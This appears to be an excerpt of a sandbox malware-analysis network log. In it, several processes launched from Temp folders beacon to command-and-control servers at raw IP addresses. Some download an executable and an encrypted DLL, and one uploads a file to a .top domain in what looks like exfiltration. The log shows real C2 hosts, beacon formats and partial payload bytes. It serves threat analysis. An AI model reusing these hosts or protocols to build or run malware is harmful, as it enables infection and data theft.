Dec 22, 2024 02:18:16.150073051 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:15 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Dec 22, 2024 02:18:16.150213957 CET	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Dec 22, 2024 02:18:16.152328968 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	50124	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:11.520626068 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:12.786649942 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:12 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	50129	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:13.949846983 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 39 38 31 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019812001&unit=246122658369
Dec 22, 2024 02:18:15.271295071 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	50131	185.156.73.23	80	5548	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:14.287843943 CET	414	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:15.639784098 CET	204	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 22, 2024 02:18:15.698951960 CET	388	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:16.173317909 CET	224	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 22, 2024 02:18:16.526710033 CET	393	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:17.083144903 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 22, 2024 02:18:17.083183050 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Dec 22, 2024 02:18:17.083219051 CET	448	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Dec 22, 2024 02:18:17.083311081 CET	1236	IN	Data Raw: 94 56 6f 92 44 df 99 d0 e2 07 87 22 38 2a d1 8d 6b 3b c8 f7 e1 b5 00 e9 38 74 ca 24 b7 c2 3f 88 77 ac 79 7e 4b f0 5e 79 57 bd f5 65 c6 f8 b8 fd c0 5d 9c 70 37 a5 45 ab 76 ba a0 33 8b ee 99 a3 da 61 9a 35 1f f1 31 09 03 71 96 d5 28 76 57 11 9e 5e Data Ascii: VoD"8k;8t$?wy~K^yWe]p7Ev3a51q(vW^RK@$V+4trcwMMZoj^}xmgu0f'US]04<cMk2cD$g\|5r_gqKgLoZ
Dec 22, 2024 02:18:17.083360910 CET	1236	IN	Data Raw: 58 c0 cb 65 40 62 96 d2 c0 5a b0 40 d6 25 d6 ca ea 81 87 4f 4f 97 dc 41 ef 2a 66 64 06 53 6d 2a 3f d8 44 59 af 7a 70 c9 ee 8f c8 c1 db 27 48 69 d8 e7 8e c2 56 b7 01 bc 0b 63 45 c8 b6 b5 e2 1a ee a7 1a fe a7 05 65 86 dc c4 60 f9 00 38 79 10 46 0b Data Ascii: Xe@bZ@%OOAfdSm?DYzp'HiVcEe`8yF\|G(^80y-`p+x@Q.QjK=s3GVBfP:}^-RuJhJHz#<6S}Cc*>:cNZNG1M4
Dec 22, 2024 02:18:17.083396912 CET	1236	IN	Data Raw: 97 c8 49 60 d1 46 16 fc 9d 61 11 37 f4 93 5e ed 32 7a c7 3b 41 14 16 b7 4f 84 8d 39 ca 79 46 fc 2f a4 a6 82 f3 b6 68 61 61 41 32 66 02 00 57 51 d9 b9 0a 9a 35 e2 01 f6 64 48 f1 ee 15 5c 2f c3 ce e2 74 99 ad e8 49 c0 49 83 58 d9 d9 5f 15 11 8a 28 Data Ascii: I`Fa7^2z;AO9yF/haaA2fWQ5dH\/tIIX_( N%"PPLT(yFqG=)hZX.`2RsbifK!97e9f\|uUsetj9L~DY)5:w<}gBO$5)iI
Dec 22, 2024 02:18:17.083432913 CET	1236	IN	Data Raw: bd fe 32 26 39 43 46 ac 46 98 3a a9 90 2f db c5 e7 08 95 6c c4 71 43 67 26 21 a1 8e e2 57 01 bf 17 eb ec 95 38 79 19 72 66 f5 b3 f7 1b 75 10 9d 34 6d e2 d0 9a 09 6a 6b 6e fb a0 1b a0 0c 89 8d 39 0d 7b 82 10 1c fb a1 a0 b6 fb 0b bd 91 68 87 0f bc Data Ascii: 2&9CFF:/lqCg&!W8yrfu4mjkn9{h`e\lrp<wW+:s_m]sad8t43g\]Dh-@H<\|jSWU@E/]-L[uNIhq8~'??y9<N5)g.AK2T
Dec 22, 2024 02:18:17.083729982 CET	896	IN	Data Raw: 9c 93 85 55 4b b0 90 0f 56 82 0c 86 f6 cc 27 8b b1 b8 1f 77 0d b6 88 24 2a 38 27 bc 8c 03 45 5b 5b 2b 90 a7 9b 51 a3 04 60 88 c5 2c 4a 7a 88 0a 01 7d 0c 2e 87 47 cf 80 8f 5e 70 62 4c d5 ad ce bf 64 f2 8f 59 f3 8f 0c c9 92 4f 19 2f 5b b6 f8 01 87 Data Ascii: UKV'w$8'E[[+Q`,Jz}.G^pbLdYO/[)o319Xz&k(pB~IjB1aNG^L/QAD!B5F$%RkQzo):z4fJnpb7[w\n@hm,tsY!FZb[.LJT/
Dec 22, 2024 02:18:17.086100101 CET	1236	IN	Data Raw: 34 ba a9 d6 80 6d a5 ac 9f d3 80 17 6f 02 df fe 4e 07 6d 30 c4 90 a4 8c 39 6b a3 a1 85 ab b3 ca 01 2d d7 3a ac 7a 54 7a bd ef a4 a1 a0 91 1e 78 f5 95 ac ec 47 63 7c 55 62 3c 14 a6 7c 59 c1 c9 3e 15 2e 8a 92 0f cc 20 54 75 23 66 b3 9f f4 b5 a1 18 Data Ascii: 4moNm09k-:zTzxGc\|Ub<\|Y>. Tu#f-UM!+g@!4<fG7IkEl#=Jdr;)\b?kkdx-<lO!2NY!8hiq[Awyw:uw%}i=M
Dec 22, 2024 02:18:17.086235046 CET	1236	IN	Data Raw: fe a0 6e c3 63 7d 51 4a 88 34 c1 3b 5b 72 7c c8 f4 ed 5e 10 25 3c 74 a5 0c fe e8 35 f9 53 85 b0 7f 5b 8f 02 41 49 61 2b a3 94 34 38 d7 d1 ef ab dc af 94 18 2a 85 ec 78 08 a4 e3 07 00 19 9d a2 73 33 c8 b1 30 ca 10 53 df b9 78 4e 9a 81 9d ef 5a b3 Data Ascii: nc}QJ4;[r\|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^usB53m3>g\REmge]PxofXd"JP, XU@po5a^
Dec 22, 2024 02:18:17.094532013 CET	1236	IN	Data Raw: 7c dc f5 13 f0 20 79 96 b6 dc 70 60 b0 aa d7 99 89 79 7a 6c 53 96 6e a0 0b 0a f6 69 a5 56 4e eb be f5 a3 28 42 76 7d a0 af 99 3a 94 58 e7 16 a3 0d b0 73 4f 9a 66 2e c2 7e 7a 9a 14 12 fb 54 81 6f bd 0e 58 38 95 18 6e 20 4b 24 d8 d5 3a 44 1d 36 82 Data Ascii: \| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[m[CK`<s%ICz TAy^}`dj[a9>AD&MoU$]Q,VSvD
Dec 22, 2024 02:18:17.633654118 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:18.116525888 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 22, 2024 02:18:20.189466000 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:20.674818993 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:20 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 22, 2024 02:18:23.021264076 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:23.505983114 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 22, 2024 02:18:25.750762939 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:26.235935926 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 22, 2024 02:18:28.917133093 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:29.403192997 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:29 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 22, 2024 02:18:31.635219097 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:32.137281895 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:31 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	50133	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:14.613398075 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:15.949302912 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:15 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	50137	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:17.151326895 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:18.478761911 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	50139	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:17.594305992 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:18.929651022 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:18 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	50142	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:20.113603115 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 22, 2024 02:18:21.448656082 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	50143	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:21.084085941 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:22.413410902 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:22 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	50144	185.121.15.192	80	2648	C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:22.757028103 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: fivetk5sb.top Accept: / Content-Length: 27550 Content-Type: multipart/form-data; boundary=------------------------LD6ZS6L8rUHFQ5ehyM7ZrT Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4c 44 36 5a 53 36 4c 38 72 55 48 46 51 35 65 68 79 4d 37 5a 72 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 6f 6a 69 63 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0f db fc 92 00 a4 b4 b4 17 2d 84 27 24 e9 64 cc c5 55 b2 88 bd 02 13 a9 01 7e 49 8e a5 e7 65 2b 5d ac 6f 05 0d 41 f6 2a c6 9e 47 6c da ec 9b 40 83 ac 49 6f 82 1c 97 7e 92 b7 7c 37 d6 57 19 84 60 22 33 9d 97 87 a5 9f 18 e7 28 6e f6 ca 